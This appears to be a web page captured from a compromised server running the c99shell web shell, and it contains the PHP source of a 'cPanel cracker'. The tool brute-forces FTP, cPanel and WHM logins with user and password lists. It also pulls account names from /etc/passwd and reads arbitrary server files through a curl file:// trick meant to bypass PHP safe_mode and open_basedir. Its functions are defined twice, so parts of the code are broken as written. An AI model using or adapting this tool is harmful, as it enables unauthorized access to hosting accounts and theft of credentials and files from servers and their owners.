www.mina-info.me - c99shell

!C99Shell v. 1.0 pre-release build #16!
Software: Apache/2.0.54 (Fedora). PHP/5.0.4 uname -a: Linux mina-info.me 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 2006 i686 uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_t Safe-mode: OFF (not secure) /home/mnnews/public_html/mina/manage/dokumenti/ drwxrwxrwx Free 4.38 GB of 27.03 GB (16.21%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<html>

<head>

<meta http-equiv="Content-Language" content="en-us">

</head>

<title>james0baster cPanel cracker</title>

<style>

body{margin:0px;font-style:normal;font-size:10px;color:#FFFFFF;font-family:Verdana,Arial;background-color:#104c08;scrollbar-face-color: #104c08;scrollbar-highlight-color: #104c08;scrollbar-shadow-color: #121212;scrollbar-3dlight-color: #104c08;scrollbar-arrow-color: #ffffff;scrollbar-track-color: #104c08;scrollbar-darkshadow-color: #104c08;}

input,

.kbrtm,select{background:#303030;color:#FFFFFF;font-family:Verdana,Arial;font-size:10px;vertical-align:middle; height:18; border-left:1px solid #5d5d5d; border-right:1px solid #121212; border-bottom:1px solid #121212; border-top:1px solid #5d5d5d;}

button{background-color: #666666; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}

body,td,th { font-family: verdana; color: #42ff00; font-size: 11px;}body { background-color: #000000;}

a:active { outline: none; }

a:focus { -moz-outline-style: none; }

</style>

  <style type='text/css'>

  <!--

       A:link {text-decoration: none; color:#ff0000 }

       A:visited {text-decoration: none; color:#ff0000 }

       a:hover {text-decoration: none; color:#000000}

  -->

</style>

<?php

/* This Code was originaly written by POKENG [HN Crew]

we are not responsible for any damage/usage done with this script 

    http://hacker-newbie.org

*/

@ini_set('memory_limit', 9999999999999);

$connect_timeout=5;

@set_time_limit(0);

$pokeng = $_REQUEST['submit'];

$hn = $_REQUEST['users'];

$crew = $_REQUEST['passwords'];

$pasti = $_REQUEST['sasaran'];

$bisa = $_REQUEST['option'];

$maju = $_GET['page'];



if($pasti == ''){

$pasti = 'localhost';

}

?>



<?php

 print "<br><br><br><center><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='70%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td width='70%'>

<br><b><center><a href='?page=home'> home </a> - <a href='?page=sikat'> sikat </a> - <a href='?page=nihserver'> sikat local </a> - <a href='?page=pokeng'> cari user </a><br><br></center></td></tr></table>";

 if ( $maju == 'home' ){

print 

"<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>

<br><b>Please enter your USERNAME and PASSWORD to logon<br>

james0baster<br>

220 +ok<br>

pass ********<br>

220 +ok login successful<br>

[ james0baster@james0baster.web.id ]# info<b><br><font face=tahoma><br>

<font color='red' >james0baster cPanel cracker</font><b><br><br>

ftp dan cPanel brute forcer , php 5.2.9 safe_mode dan open_basedir bypasser ...<br>

Our website , <a href='http://james0baster.web.id'> http://james0baster.web.id</a><br>

</center><br></td></tr></table>";

 }elseif( $maju == 'sikat'){

 // HN TEAM [HN FAMILY]

@ini_set('memory_limit', 999999999999);

$connect_timeout=5;

@set_time_limit(0);

$pokeng = $_REQUEST['submit'];

$hn = $_REQUEST['users'];

$crew = $_REQUEST['passwords'];

$pasti = $_REQUEST['sasaran'];

$bisa = $_REQUEST['option'];

if($pasti == ''){

$pasti = 'localhost';

}

print " <div align='center'>

<form method='post' style='border: 1px solid #000000'><br><br>

<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>

<b> sasaran  : </font><input type='text' name='sasaran' size='16' value= $pasti style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>

<div align='center'><br>

<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>

<tr>

<td align='center'>

<b>User</b></td>

<td>

<p align='center'>

<b>Pass</b></td>

</tr>

</table>

<p align='center'>

<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$hn</textarea>

<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>

<br>                         

<b>Pilih dahk : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel 

<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp 

<input name='option' value='whm' style='font-weight: 700;' checked type='radio'> whm ==> <input type='submit' value='brute' name='submit' ></p>

</td></tr></table></td></tr></form><p align= 'left'>";

?>

<?php

function ftp_check($anjink,$asu,$babi,$lonte){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "ftp://$anjink");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);

curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);

curl_setopt($ch, CURLOPT_FAILONERROR, 1);

$data = curl_exec($ch);

if ( curl_errno($ch) == 28 ) {



print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";

exit;}



elseif ( curl_errno($ch) == 0 ){



print 

"<b>[ james0baster@james0baster.web.id ]# </b>

<b> serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan passwordnya = 

<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}



function cpanel_check($anjink,$asu,$babi,$lonte){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);

curl_setopt($ch, CURLOPT_FAILONERROR, 1);

$data = curl_exec($ch);

if ( curl_errno($ch) == 28 ) { 

print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";

exit;}

elseif ( curl_errno($ch) == 0 ){



print 

"<b>[ james0baster@james0baster.web.id ]# </b>

<b>Serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan passwordnya = 

<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}



function whm_check($anjink,$asu,$babi,$lonte){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);

curl_setopt($ch, CURLOPT_FAILONERROR, 1);

$data = curl_exec($ch);

if ( curl_errno($ch) == 28 ) { 

print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";

exit;}

elseif ( curl_errno($ch) == 0 ){



print 

"<b>[ james0baster@james0baster.web.id ]# </b>

<b>Serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan passwordnya = 

<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}



if(isset($pokeng) && !empty($pokeng)){



$userlist = explode ("\n" , $hn );

$passlist = explode ("\n" , $crew );

print "<b>[ james0baster@james0baster.web.id ]# Seraaaanngg ...</font></b><br>";

foreach ($userlist as $asu) {

$_user = trim($asu);

foreach ($passlist as $babi ) {

$_pass = trim($babi);

if($bisa == "ftp"){

ftp_check($pasti,$_user,$_pass,$lonte);

}

if ($bisa == "cpanel")

{

cpanel_check($pasti,$_user,$_pass,$lonte);

}

if ($bisa == "whm")

{

whm_check($pasti,$_user,$_pass,$lonte);

}

}

}

}

}



elseif( $maju == 'nihserver'){

 // HN TEAM [HN FAMILY]

@ini_set('memory_limit', 999999999999);

$connect_timeout=5;

@set_time_limit(0);

$pokeng = $_REQUEST['submit'];

$hn = $_REQUEST['users'];

$crew = $_REQUEST['passwords'];

$pasti = $_REQUEST['sasaran'];

$bisa = $_REQUEST['option'];

if($pasti == ''){

$pasti = 'localhost';

}

function get_users()

{

  $users = array();

  $rows=file('/etc/passwd');

  if(!$rows) return 0;    

  foreach ($rows as $string)

   {

       $user = @explode(":",$string);

       if(substr($string,0,1)!='#') array_push($users,$user[0]);

   }

  return $users;     

}

if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }

 else 

  { 

  

print " <div align='center'>

<form method='post' style='border: 1px solid #000000'><br><br>

<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#666666 border=1><tr><td>

<b> sasaran  : </font><input type='text' name='sasaran' size='16' value= $pasti style='border: font-family:Verdana; font-weight:bold;'></p></font></b></p>

<div align='center'><br>

<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#666666 border=1>

<tr>

<td align='center'>

<b>User</b></td>

<td>

<p align='center'>

<b>Pass</b></td>

</tr>

</table>

<p align='center'>

<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";foreach($users as $user) { echo $user."\n"; } print"$hn</textarea>

<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$crew</textarea><br>

<br>                         

<b>Pilih dahk : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel 

<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp 

<input name='option' value='whm' style='font-weight: 700;' checked type='radio'> whm ==> <input type='submit' value='brute' name='submit' ></p>

</td></tr></table></td></tr></form><p align= 'left'>";}

?>

<?php

function ftp_check($anjink,$asu,$babi,$lonte){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "ftp://$anjink");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);

curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);

curl_setopt($ch, CURLOPT_FAILONERROR, 1);

$data = curl_exec($ch);

if ( curl_errno($ch) == 28 ) {



print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";

exit;}



elseif ( curl_errno($ch) == 0 ){



print 

"<b>[ james0baster@james0baster.web.id ]# </b>

<b> serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan passwordnya = 

<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}



function cpanel_check($anjink,$asu,$babi,$lonte){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://$anjink:2082");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);

curl_setopt($ch, CURLOPT_FAILONERROR, 1);

$data = curl_exec($ch);

if ( curl_errno($ch) == 28 ) { 

print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";

exit;}

elseif ( curl_errno($ch) == 0 ){



print 

"<b>[ james0baster@james0baster.web.id ]# </b>

<b>Serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan passwordnya = 

<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}



function whm_check($anjink,$asu,$babi,$lonte){

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "http://$anjink:2086");

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);

curl_setopt($ch, CURLOPT_USERPWD, "$asu:$babi");

curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $lonte);

curl_setopt($ch, CURLOPT_FAILONERROR, 1);

$data = curl_exec($ch);

if ( curl_errno($ch) == 28 ) { 

print "<b> Gagal : ahh,,kelama'an , sasaranmu udah tepat blonnd?? !</b>";

exit;}

elseif ( curl_errno($ch) == 0 ){



print 

"<b>[ james0baster@james0baster.web.id ]# </b>

<b>Serangan selesai , nihk username = <font color='#FF0000'> $asu </font> dan passwordnya = 

<font color='#FF0000'> $babi </font></b><br>";}curl_close($ch);}



if(isset($pokeng) && !empty($pokeng)){



$userlist = explode ("\n" , $hn );

$passlist = explode ("\n" , $crew );

print "<b>[ james0baster@james0baster.web.id ]# Seraaaanngg ...</font></b><br>";

foreach ($userlist as $asu) {

$_user = trim($asu);

foreach ($passlist as $babi ) {

$_pass = trim($babi);

if($bisa == "ftp"){

ftp_check($pasti,$_user,$_pass,$lonte);

}

if ($bisa == "cpanel")

{

cpanel_check($pasti,$_user,$_pass,$lonte);

}

if ($bisa == "whm")

{

whm_check($pasti,$_user,$_pass,$lonte);

}

}

}

}

}



elseif ( $maju == 'pokeng'){

echo "<br><br><TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#666666 cellPadding=5 width='40%'bgColor=#303030 borderColorLight=#666666 border=1><tr><td>";

echo '<p><form name="form" action="" method="post"><input type="text" name="file" size="50" value="'.htmlspecialchars($file).'"><input type="submit" name="hardstylez" value="carii !"></form>';

$file = $_POST['file'];

$level=0;

if(!file_exists("file:"))

    @mkdir("file:");

@chdir("file:");

$level++;



$hardstyle = @explode("/", $file); // A R I A 



for($a=0;$a<count($hardstyle);$a++){

    if(!empty($hardstyle[$a])){

        if(!file_exists($hardstyle[$a])) 

            @mkdir($hardstyle[$a]);

        @chdir($hardstyle[$a]);

        $level++;

    }

}

while($level--) chdir("..");

$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, "file:file:///".$file);

echo "<textarea rows='30' cols='120' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0' >";

if(FALSE==curl_exec($ch))

die('Maaf... File '.htmlspecialchars($file).' gak ada atau km gak di kasih permisi.');

echo ' </textarea> </FONT>';

curl_close($ch);

print '</table>';

}

?>
:: Command execute ::
Enter:	Select: